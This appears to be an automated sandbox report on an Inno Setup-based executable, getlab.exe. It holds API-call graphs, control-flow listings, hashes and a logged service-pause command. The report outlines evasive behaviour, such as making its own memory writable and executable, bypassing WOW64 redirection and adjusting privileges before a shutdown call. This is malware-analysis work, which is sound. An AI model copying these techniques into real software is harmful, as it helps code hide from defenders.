                                                                        Wow64 process (32bit):true
                                                                        Commandline:C:\Windows\system32\net1 pause xl_gear_11293
                                                                        Imagebase:0xd70000
                                                                        File size:139'776 bytes
                                                                        MD5 hash:2EFE6ED4C294AB8A39EB59C80813FEC1
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true


                                                                          Execution Graph

                                                                          Execution Coverage:21.2%
                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                          Signature Coverage:2.4%
                                                                          Total number of Nodes:1498
                                                                          Total number of Limit Nodes:22
                                                                          execution_graph 4978 409c40 5019 4030dc 4978->5019 4980 409c56 5022 4042e8 4980->5022 4982 409c5b 5025 40457c GetModuleHandleA GetProcAddress 4982->5025 4988 409c6a 5042 4090a4 GetModuleHandleA GetProcAddress GetModuleHandleA GetProcAddress 4988->5042 5005 409d43 5104 4074a0 5005->5104 5007 409d05 5007->5005 5137 409aa0 5007->5137 5008 409d84 5108 407a28 5008->5108 5009 409d69 5009->5008 5010 409aa0 4 API calls 5009->5010 5010->5008 5012 409da9 5118 408b08 5012->5118 5016 409def 5017 408b08 21 API calls 5016->5017 5018 409e28 5016->5018 5017->5016 5147 403094 5019->5147 5021 4030e1 GetModuleHandleA GetCommandLineA 5021->4980 5024 404323 5022->5024 5148 403154 5022->5148 5024->4982 5026 404598 5025->5026 5027 40459f GetProcAddress 5025->5027 5026->5027 5028 4045b5 GetProcAddress 5027->5028 5029 4045ae 5027->5029 5030 4045c4 SetProcessDEPPolicy 5028->5030 5031 4045c8 5028->5031 5029->5028 5030->5031 5032 4065b8 5031->5032 5161 405c98 5032->5161 5041 406604 6F551CD0 5041->4988 5043 4090f7 5042->5043 5288 406fa0 SetErrorMode 5043->5288 5048 403198 4 API calls 5049 40913c 5048->5049 5050 409b30 GetSystemInfo VirtualQuery 5049->5050 5051 409be4 5050->5051 5052 409b5a 5050->5052 5056 409768 5051->5056 5052->5051 5053 409bc5 VirtualQuery 5052->5053 5054 409b84 VirtualProtect 5052->5054 5055 409bb3 VirtualProtect 5052->5055 5053->5051 5053->5052 5054->5052 5055->5053 5298 406bd0 GetCommandLineA 5056->5298 5058 409825 5060 4031b8 4 API calls 5058->5060 5059 406c2c 6 API calls 5062 409785 5059->5062 5061 40983f 5060->5061 5064 406c2c 5061->5064 5062->5058 5062->5059 5063 403454 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5062->5063 5063->5062 5065 406c53 GetModuleFileNameA 5064->5065 5066 406c77 GetCommandLineA 5064->5066 5067 403278 4 API calls 5065->5067 5068 406c7c 5066->5068 5069 406c75 5067->5069 5070 406c81 5068->5070 5071 406af0 4 API calls 5068->5071 5074 406c89 5068->5074 5072 406ca4 
5069->5072 5073 403198 4 API calls 5070->5073 5071->5068 5075 403198 4 API calls 5072->5075 5073->5074 5076 40322c 4 API calls 5074->5076 5077 406cb9 5075->5077 5076->5072 5078 4031e8 5077->5078 5079 4031ec 5078->5079 5082 4031fc 5078->5082 5081 403254 4 API calls 5079->5081 5079->5082 5080 403228 5084 4074e0 5080->5084 5081->5082 5082->5080 5083 4025ac 4 API calls 5082->5083 5083->5080 5085 4074ea 5084->5085 5319 407576 5085->5319 5322 407578 5085->5322 5086 407516 5087 40752a 5086->5087 5325 40748c GetLastError 5086->5325 5091 409bec FindResourceA 5087->5091 5092 409c01 5091->5092 5093 409c06 SizeofResource 5091->5093 5094 409aa0 4 API calls 5092->5094 5095 409c13 5093->5095 5096 409c18 LoadResource 5093->5096 5094->5093 5097 409aa0 4 API calls 5095->5097 5098 409c26 5096->5098 5099 409c2b LockResource 5096->5099 5097->5096 5100 409aa0 4 API calls 5098->5100 5101 409c37 5099->5101 5102 409c3c 5099->5102 5100->5099 5103 409aa0 4 API calls 5101->5103 5102->5007 5134 407918 5102->5134 5103->5102 5105 4074b4 5104->5105 5106 4074c4 5105->5106 5107 4073ec 20 API calls 5105->5107 5106->5009 5107->5106 5109 407a35 5108->5109 5110 405880 4 API calls 5109->5110 5111 407a89 5109->5111 5110->5111 5112 407918 InterlockedExchange 5111->5112 5113 407a9b 5112->5113 5114 405880 4 API calls 5113->5114 5115 407ab1 5113->5115 5114->5115 5116 405880 4 API calls 5115->5116 5117 407af4 5115->5117 5116->5117 5117->5012 5127 408b82 5118->5127 5133 408b39 5118->5133 5119 407cb8 21 API calls 5119->5133 5120 408bcd 5433 407cb8 5120->5433 5121 407cb8 21 API calls 5121->5127 5124 408be4 5126 4031b8 4 API calls 5124->5126 5125 4034f0 4 API calls 5125->5127 5128 408bfe 5126->5128 5127->5120 5127->5121 5127->5125 5131 403420 4 API calls 5127->5131 5132 4031e8 4 API calls 5127->5132 5144 404c10 5128->5144 5129 403420 4 API calls 5129->5133 5130 4031e8 4 API calls 5130->5133 5131->5127 5132->5127 5133->5119 5133->5127 5133->5129 5133->5130 5424 4034f0 5133->5424 5459 4078c4 5134->5459 5138 409ac1 
5137->5138 5139 409aa9 5137->5139 5141 405880 4 API calls 5138->5141 5140 405880 4 API calls 5139->5140 5142 409abb 5140->5142 5143 409ad2 5141->5143 5142->5005 5143->5005 5145 402594 4 API calls 5144->5145 5146 404c1b 5145->5146 5146->5016 5147->5021 5149 403164 5148->5149 5150 40318c TlsGetValue 5148->5150 5149->5024 5151 403196 5150->5151 5152 40316f 5150->5152 5151->5024 5156 40310c 5152->5156 5154 403174 TlsGetValue 5155 403184 5154->5155 5155->5024 5157 403120 LocalAlloc 5156->5157 5158 403116 5156->5158 5159 40313e TlsSetValue 5157->5159 5160 403132 5157->5160 5158->5157 5159->5160 5160->5154 5233 405930 5161->5233 5164 405270 GetSystemDefaultLCID 5166 4052a6 5164->5166 5165 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5165->5166 5166->5165 5167 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5166->5167 5168 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5166->5168 5171 405308 5166->5171 5167->5166 5168->5166 5169 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5169->5171 5170 4051fc LocalAlloc TlsSetValue TlsGetValue TlsGetValue GetLocaleInfoA 5170->5171 5171->5169 5171->5170 5172 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5171->5172 5173 40538b 5171->5173 5172->5171 5266 4031b8 5173->5266 5176 4053b4 GetSystemDefaultLCID 5270 4051fc GetLocaleInfoA 5176->5270 5179 4031e8 4 API calls 5180 4053f4 5179->5180 5181 4051fc 5 API calls 5180->5181 5182 405409 5181->5182 5183 4051fc 5 API calls 5182->5183 5184 40542d 5183->5184 5276 405248 GetLocaleInfoA 5184->5276 5187 405248 GetLocaleInfoA 5188 40545d 5187->5188 5189 4051fc 5 API calls 5188->5189 5190 405477 5189->5190 5191 405248 GetLocaleInfoA 5190->5191 5192 405494 5191->5192 5193 4051fc 5 API calls 5192->5193 5194 4054ae 5193->5194 5195 4031e8 4 API calls 5194->5195 5196 4054bb 5195->5196 5197 4051fc 5 API calls 5196->5197 5198 4054d0 5197->5198 5199 4031e8 4 API calls 5198->5199 5200 4054dd 5199->5200 5201 405248 GetLocaleInfoA 
5200->5201 5202 4054eb 5201->5202 5203 4051fc 5 API calls 5202->5203 5204 405505 5203->5204 5205 4031e8 4 API calls 5204->5205 5206 405512 5205->5206 5207 4051fc 5 API calls 5206->5207 5208 405527 5207->5208 5209 4031e8 4 API calls 5208->5209 5210 405534 5209->5210 5211 4051fc 5 API calls 5210->5211 5212 405549 5211->5212 5213 405566 5212->5213 5214 405557 5212->5214 5215 40322c 4 API calls 5213->5215 5284 40322c 5214->5284 5217 405564 5215->5217 5218 4051fc 5 API calls 5217->5218 5219 405588 5218->5219 5220 4055a5 5219->5220 5221 405596 5219->5221 5223 403198 4 API calls 5220->5223 5222 40322c 4 API calls 5221->5222 5224 4055a3 5222->5224 5223->5224 5278 4033b4 5224->5278 5226 4055c7 5227 4033b4 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5226->5227 5228 4055e1 5227->5228 5229 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5228->5229 5230 4055fb 5229->5230 5231 405ce4 GetVersionExA 5230->5231 5232 405cfb 5231->5232 5232->5041 5234 40593c 5233->5234 5241 404ccc LoadStringA 5234->5241 5237 4031e8 4 API calls 5238 40596d 5237->5238 5244 403198 5238->5244 5248 403278 5241->5248 5245 4031b7 5244->5245 5246 40319e 5244->5246 5245->5164 5246->5245 5262 4025ac 5246->5262 5253 403254 5248->5253 5250 403288 5251 403198 4 API calls 5250->5251 5252 4032a0 5251->5252 5252->5237 5254 403274 5253->5254 5255 403258 5253->5255 5254->5250 5258 402594 5255->5258 5257 403261 5257->5250 5259 402598 5258->5259 5260 4025a2 5258->5260 5259->5260 5261 403154 4 API calls 5259->5261 5260->5257 5260->5260 5261->5260 5263 4025b0 5262->5263 5264 4025ba 5262->5264 5263->5264 5265 403154 4 API calls 5263->5265 5264->5245 5264->5264 5265->5264 5268 4031be 5266->5268 5267 4031e3 5267->5176 5268->5267 5269 4025ac 4 API calls 5268->5269 5269->5268 5271 405223 5270->5271 5272 405235 5270->5272 5273 403278 4 API calls 5271->5273 5274 40322c 4 API calls 5272->5274 5275 405233 5273->5275 5274->5275 5275->5179 5277 405264 5276->5277 5277->5187 5279 4033bc 5278->5279 5280 403254 4 API calls 
5279->5280 5281 4033cf 5280->5281 5282 4031e8 4 API calls 5281->5282 5283 4033f7 5282->5283 5286 403230 5284->5286 5285 403252 5285->5217 5286->5285 5287 4025ac 4 API calls 5286->5287 5287->5285 5296 403414 5288->5296 5291 406fee 5292 407284 FormatMessageA 5291->5292 5293 4072aa 5292->5293 5294 403278 4 API calls 5293->5294 5295 4072c7 5294->5295 5295->5048 5297 403418 LoadLibraryA 5296->5297 5297->5291 5305 406af0 5298->5305 5300 406bf3 5301 406c05 5300->5301 5302 406af0 4 API calls 5300->5302 5303 403198 4 API calls 5301->5303 5302->5300 5304 406c1a 5303->5304 5304->5062 5306 406b1c 5305->5306 5307 403278 4 API calls 5306->5307 5308 406b29 5307->5308 5315 403420 5308->5315 5310 406b31 5311 4031e8 4 API calls 5310->5311 5312 406b49 5311->5312 5313 403198 4 API calls 5312->5313 5314 406b6b 5313->5314 5314->5300 5316 403426 5315->5316 5318 403437 5315->5318 5317 403254 4 API calls 5316->5317 5316->5318 5317->5318 5318->5310 5320 407578 5319->5320 5321 4075b7 CreateFileA 5320->5321 5321->5086 5323 403414 5322->5323 5324 4075b7 CreateFileA 5323->5324 5324->5086 5328 4073ec 5325->5328 5329 407284 5 API calls 5328->5329 5330 407414 5329->5330 5331 407434 5330->5331 5337 405184 5330->5337 5340 405880 5331->5340 5334 407443 5335 403198 4 API calls 5334->5335 5336 407460 5335->5336 5336->5087 5344 405198 5337->5344 5341 405887 5340->5341 5342 4031e8 4 API calls 5341->5342 5343 40589f 5342->5343 5343->5334 5345 4051b5 5344->5345 5352 404e48 5345->5352 5348 4051e1 5350 403278 4 API calls 5348->5350 5351 405193 5350->5351 5351->5331 5355 404e63 5352->5355 5353 404e75 5353->5348 5357 404bd4 5353->5357 5355->5353 5360 404f6a 5355->5360 5367 404e3c 5355->5367 5358 405930 5 API calls 5357->5358 5359 404be5 5358->5359 5359->5348 5361 404f7b 5360->5361 5364 404fc9 5360->5364 5363 40504f 5361->5363 5361->5364 5366 404fe7 5363->5366 5374 404e28 5363->5374 5364->5366 5370 404de4 5364->5370 5366->5355 5368 403198 4 API calls 5367->5368 5369 404e46 5368->5369 5369->5355 5371 404df2 
5370->5371 5377 404bec 5371->5377 5373 404e20 5373->5364 5390 4039a4 5374->5390 5380 4059a0 5377->5380 5379 404c05 5379->5373 5381 4059ae 5380->5381 5382 404ccc LocalAlloc TlsSetValue TlsGetValue TlsGetValue LoadStringA 5381->5382 5383 4059d8 5382->5383 5384 405184 19 API calls 5383->5384 5385 4059e6 5384->5385 5386 4031e8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5385->5386 5387 4059f1 5386->5387 5388 4031b8 LocalAlloc TlsSetValue TlsGetValue TlsGetValue 5387->5388 5389 405a0b 5388->5389 5389->5379 5391 4039ab 5390->5391 5396 4038b4 5391->5396 5393 4039cb 5394 403198 4 API calls 5393->5394 5395 4039d2 5394->5395 5395->5366 5397 4038d5 5396->5397 5398 4038c8 5396->5398 5400 403934 5397->5400 5401 4038db 5397->5401 5399 403780 6 API calls 5398->5399 5404 4038d0 5399->5404 5402 403993 5400->5402 5403 40393b 5400->5403 5405 4038e1 5401->5405 5406 4038ee 5401->5406 5407 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5402->5407 5408 403941 5403->5408 5409 40394b 5403->5409 5404->5393 5410 403894 6 API calls 5405->5410 5411 403894 6 API calls 5406->5411 5407->5404 5412 403864 9 API calls 5408->5412 5413 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5409->5413 5410->5404 5414 4038fc 5411->5414 5412->5404 5415 40395d 5413->5415 5416 4037f4 VariantClear VariantChangeTypeEx VariantChangeTypeEx 5414->5416 5418 403864 9 API calls 5415->5418 5417 403917 5416->5417 5420 40374c VariantClear 5417->5420 5419 403976 5418->5419 5422 40374c VariantClear 5419->5422 5421 40392c 5420->5421 5421->5393 5423 40398b 5422->5423 5423->5393 5425 4034fd 5424->5425 5431 40352d 5424->5431 5427 403526 5425->5427 5429 403509 5425->5429 5426 403198 4 API calls 5432 403517 5426->5432 5428 403254 4 API calls 5427->5428 5428->5431 5439 4025c4 5429->5439 5431->5426 5432->5133 5434 407cd3 5433->5434 5438 407cc8 5433->5438 5443 407c5c 5434->5443 5437 405880 4 API calls 5437->5438 5438->5124 5440 4025ca 5439->5440 5441 4025dc 5440->5441 5442 403154 4 API calls 5440->5442 
5441->5432 5441->5441 5442->5441 5444 407c70 5443->5444 5445 407caf 5443->5445 5444->5445 5447 407bac 5444->5447 5445->5437 5445->5438 5448 407bb7 5447->5448 5451 407bc8 5447->5451 5449 405880 4 API calls 5448->5449 5449->5451 5450 4074a0 20 API calls 5452 407bdc 5450->5452 5451->5450 5453 4074a0 20 API calls 5452->5453 5454 407bfd 5453->5454 5455 407918 InterlockedExchange 5454->5455 5456 407c12 5455->5456 5457 407c28 5456->5457 5458 405880 4 API calls 5456->5458 5457->5444 5458->5457 5460 4078d6 5459->5460 5461 4078e7 5459->5461 5462 4078db InterlockedExchange 5460->5462 5461->5007 5462->5461 6235 409e47 6236 409e6c 6235->6236 6237 4098f4 15 API calls 6236->6237 6241 409e71 6237->6241 6238 409ec4 6269 4026c4 GetSystemTime 6238->6269 6240 409ec9 6242 409330 32 API calls 6240->6242 6241->6238 6244 408dd8 4 API calls 6241->6244 6243 409ed1 6242->6243 6245 4031e8 4 API calls 6243->6245 6246 409ea0 6244->6246 6247 409ede 6245->6247 6248 409ea8 MessageBoxA 6246->6248 6249 406928 5 API calls 6247->6249 6248->6238 6250 409eb5 6248->6250 6251 409eeb 6249->6251 6252 405854 5 API calls 6250->6252 6253 4066c0 5 API calls 6251->6253 6252->6238 6254 409efb 6253->6254 6255 406638 5 API calls 6254->6255 6256 409f0c 6255->6256 6257 403340 4 API calls 6256->6257 6258 409f1a 6257->6258 6259 4031e8 4 API calls 6258->6259 6260 409f2a 6259->6260 6261 4074e0 23 API calls 6260->6261 6262 409f69 6261->6262 6263 402594 4 API calls 6262->6263 6264 409f89 6263->6264 6265 407a28 5 API calls 6264->6265 6266 409fcb 6265->6266 6267 407cb8 21 API calls 6266->6267 6268 409ff2 6267->6268 6269->6240 6196 407548 6197 407554 CloseHandle 6196->6197 6198 40755d 6196->6198 6197->6198 6648 402b48 RaiseException 6199 407749 6200 4076dc WriteFile 6199->6200 6209 407724 6199->6209 6201 4076e8 6200->6201 6202 4076ef 6200->6202 6203 40748c 21 API calls 6201->6203 6204 407700 6202->6204 6205 4073ec 20 API calls 6202->6205 6203->6202 6205->6204 6206 4077e0 6207 4078db InterlockedExchange 6206->6207 6208 407890 
[Call graph of getlab.exe as drawn by the interactive Joe Sandbox viewer; the node and edge data behind it is not reproducible as text. Win32 APIs called directly from the graphed functions, by calling address:]

File and path handling: CreateFileA (403b0e), ReadFile (403a28, 40762c, 403b6a), WriteFile (403a52, 4076c8), SetFilePointer (4075c4, 403b4e, 403b9f), GetFileSize (4075fa, 403b3b), SetEndOfFile (4076ac, 403bb0), GetFileType (403be7), GetStdHandle (4011ac, 403bbc), CloseHandle (403a80, 403c02, 409a24, 409a4e), GetFileAttributesA (406a06), GetFullPathNameA (4068ab), CreateDirectoryA (409375), DeleteFileA (408ff2), RemoveDirectoryA (40a233), GetWindowsDirectoryA (406cc8), GetEnvironmentVariableA (406a82), GetCommandLineA (406b7c). The DeleteFileA call is bracketed by Wow64DisableWow64FsRedirection (408f87) and Wow64RevertWow64FsRedirection (408fb1).
Registry: RegOpenKeyExA (406f79), RegQueryValueExA (406e36, 406eb0), RegCloseKey (406f47, 4070d5), reached from a GetModuleHandleA/GetProcAddress lookup (407024).
Process and UI: CreateProcessA (409a11) followed by a PeekMessageA/TranslateMessage/DispatchMessageA/MsgWaitForMultipleObjects wait loop (409978) and GetExitCodeProcess (409a4e); CreateWindowExA/SetWindowLongA (40a10f), CallWindowProcA (409956), MessageBoxA (403d8f, 409ea8, 40973d, 40a2b3), Sleep (4094f3, 409503), SetErrorMode (407008), ExitProcess (403ddf), and a call to the external address 73A25CF0 (40a242).
Shutdown: GetCurrentProcess/OpenProcessToken (409454), LookupPrivilegeValueA/AdjustTokenPrivileges (40946a), then ExitWindowsEx (4094af), i.e. the sample adjusts a privilege on its own token before the shutdown call.
Locale and strings: GetUserDefaultLangID (40959d), GetACP (4095cb, 409615), IsDBCSLeadByte (406680), CharPrevA (406970), GetSystemTime (4026c4), VariantClear (403779).
Runtime and memory: LocalAlloc/LocalFree, VirtualAlloc/VirtualFree (401494, 40143f, 401626, 407ec7, 407ed9), LocalAlloc with TlsSetValue/TlsGetValue (4032fc), RtlInitializeCriticalSection/RtlEnterCriticalSection/RtlLeaveCriticalSection/RtlDeleteCriticalSection (401918, 401a04, 401aa9), InterlockedExchange (407918), RaiseException and RtlUnwind for exception dispatch (402b31, 402bd5, 402e7a and others), SetLastError/GetLastError.

Control-flow Graph

Function 00409B30 to 00409BEB. The interactive viewer's executed / not-executed colouring of the blocks is not preserved in this text rendering. Basic blocks, the APIs called in them, and their successors:

  116  409b30-409b54  GetSystemInfo, VirtualQuery(00400000, ?, 1C)  -> 117, 118
  117  409be4-409beb  (no successors)
  118  409b5a                                                   -> 119
  119  409bd9-409bde                                            -> 117, 120
  120  409b5c-409b63                                            -> 121, 122
  121  409bc5-409bd7  VirtualQuery(?, ?, 1C)                    -> 117, 119
  122  409b65-409b69                                            -> 121, 123
  123  409b6b-409b73                                            -> 124, 125
  124  409b84-409b95  VirtualProtect(?, ?, 40, ?)               -> 126, 127
  125  409b75-409b78                                            -> 124, 128
  126  409b97                                                   -> 127
  127  409b99-409b9b                                            -> 130
  128  409b7a-409b7d                                            -> 124, 129
  129  409b7f-409b82                                            -> 124, 127
  130  409baa-409bad                                            -> 131, 132
  131  409b9d-409ba6  call 409b28                               -> 130
  132  409baf-409bb1                                            -> 121, 134
  134  409bb3-409bc0  VirtualProtect(?, ?, ?, ?)                -> 121

Read together with the APIs list below: the outer loop (119 -> 120 -> ... -> 121 -> 119) walks the address space region by region with VirtualQuery, starting at the image base 00400000 and using a 0x1C-byte MEMORY_BASIC_INFORMATION, which is the 32-bit layout of that structure. For a region that passes the checks in blocks 120 to 123, block 124 sets its protection to 00000040 = PAGE_EXECUTE_READWRITE, blocks 130/131 call 409b28 in a loop, and block 134 calls VirtualProtect again with a protection value that is not resolved statically, before the next VirtualQuery. The sample therefore makes pages of its own image writable and executable at run time and modifies them, consistent with an unpacking or self-decrypting stub.
APIs
• GetSystemInfo.KERNEL32(?), ref: 00409B42
• VirtualQuery.KERNEL32(00400000,?,0000001C,?), ref: 00409B4D
• VirtualProtect.KERNEL32(?,?,00000040,?,00400000,?,0000001C,?), ref: 00409B8E
• VirtualProtect.KERNEL32(?,?,?,?,?,?,00000040,?,00400000,?,0000001C,?), ref: 00409BC0
• VirtualQuery.KERNEL32(?,?,0000001C,00400000,?,0000001C,?), ref: 00409BD0
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: Virtual$ProtectQuery$InfoSystem
                                                                          • String ID:
                                                                          • API String ID: 2441996862-0
                                                                          • Opcode ID: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                          • Instruction ID: 3002c4020e31fcb34e6ffc2d5983d7aa910ebdc8277ab133fd4bc27d875cdae8
                                                                          • Opcode Fuzzy Hash: 9fe1c1492d4e2c4f54cecc4c125b8c20c153f3aea56d010d52fe367946264e59
                                                                          • Instruction Fuzzy Hash: F4219DB12003046BD7709AA99C85E5777E9EB85370F04082BFA89E32D3D239FC40C669
                                                                          APIs
                                                                          • GetLocaleInfoA.KERNEL32(?,00000044,?,00000100,0040C4BC,00000001,?,004052C7,?,00000000,004053A6), ref: 0040521A
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: InfoLocale
                                                                          • String ID:
                                                                          • API String ID: 2299586839-0
                                                                          • Opcode ID: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                          • Instruction ID: f5e54e9283223dc3068d295e9d46a059fb55c29f9ef527c49189185961fa2cd4
                                                                          • Opcode Fuzzy Hash: aeae165a0667224cac4d27e5e834f0a87ce76ef06cf9607ed78754c9c470ac4f
                                                                          • Instruction Fuzzy Hash: 42E0927170021426D710A9A99C86AEB735CEB58310F4002BFB908E73C6EDB49E844AEE

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,?,00409C60), ref: 00404582
                                                                          • GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040458F
                                                                          • GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 004045A5
                                                                          • GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 004045BB
                                                                          • SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00409C60), ref: 004045C6
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressProc$HandleModulePolicyProcess
                                                                          • String ID: SetDllDirectoryW$SetProcessDEPPolicy$SetSearchPathMode$kernel32.dll
                                                                          • API String ID: 3256987805-3653653586
                                                                          • Opcode ID: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                          • Instruction ID: 1f393095ee8ecda9e1e01b6ca7d440447e938bbc9796bcd5dbe8d266940e5f64
                                                                          • Opcode Fuzzy Hash: 5152b1c660b0fef0348360efae9d442e0d6811f491f57bfacbbc157bf84edc67
                                                                          • Instruction Fuzzy Hash: 5FE02DD03813013AEA5032F20D83B2B20884AD0B49B2414377F25B61C3EDBDDA40587E

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • SetLastError.KERNEL32 ref: 0040A0F4
                                                                            • Part of subcall function 00409648: GetLastError.KERNEL32(00000000,004096EB,?,0040B240,?,0225233C), ref: 0040966C
                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                          • SetWindowLongA.USER32(0001043E,000000FC,00409918), ref: 0040A148
                                                                          • RemoveDirectoryA.KERNEL32(00000000,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A234
                                                                          • 73A25CF0.USER32(0001043E,0040A287,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0040A248
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: ErrorLastWindow$CreateDirectoryLongRemove
                                                                          • String ID: /SL5="$%x,%d,%d,$InnoSetupLdrWindow$STATIC
                                                                          • API String ID: 3341979996-3001827809
                                                                          • Opcode ID: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                          • Instruction ID: a1ec2b29f79e5ff862fc4fad7e4f310b8339f10a1453332cc6b7faa73b6a426b
                                                                          • Opcode Fuzzy Hash: 1a4f1778be80c46942aa9f98cae2169e0a6230f8324263ff29803b7c5577a5a1
                                                                          • Instruction Fuzzy Hash: C2411F71600205DFD710EBA9EE8AB9977A4EB45304F10467EF514B73E2CBB8A811CB9D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090C4
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090CA
                                                                          • GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,0040913D,?,?,?,?,00000000,?,00409C74), ref: 004090DE
                                                                          • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 004090E4
                                                                          Strings
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.2935806980.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                          • Associated: 00000000.00000002.2935776395.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935848926.000000000040B000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.2935873333.0000000000411000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_400000_getlab.jbxd
                                                                          Similarity
                                                                          • API ID: AddressHandleModuleProc
                                                                          • String ID: Wow64DisableWow64FsRedirection$Wow64RevertWow64FsRedirection$kernel32.dll$shell32.dll
                                                                          • API String ID: 1646373207-2130885113
                                                                          • Opcode ID: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                          • Instruction ID: 4a4222b704d734fa8d0781b40c04fe9f9c76e7b4f133337d95099c0c8a01123f
                                                                          • Opcode Fuzzy Hash: acfb4439f313785c2c2b120c37d6defef782ad7ac64c67e7eba3e924cf2abd75
                                                                          • Instruction Fuzzy Hash: 20017170748342AEFB00BB72DD4AB163A68E785704F50457BF5407A2D3DABD4C04DA6D

                                                                          Control-flow Graph

                                                                          APIs
                                                                          • CreateWindowExA.USER32(00000000,STATIC,InnoSetupLdrWindow,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00400000,00000000), ref: 0040A131
                                                                          • SetWindowLongA.USER32(0001043E,000000FC,00409918), ref: 0040A148
                                                                            • Part of subcall function 00406B7C: GetCommandLineA.KERNEL32(00000000,00406BC0,?,?,?,?,00000000,?,0040A1B9,?), ref: 00406B94
                                                                            • Part of subcall function 004099A4: CreateProcessA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90,00000000,00409A77), ref: 00409A14
                                                                            • Part of subcall function 004099A4: CloseHandle.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000044,?,?,00409A9C,0225233C,00409A90,00000000), ref: 00409A28
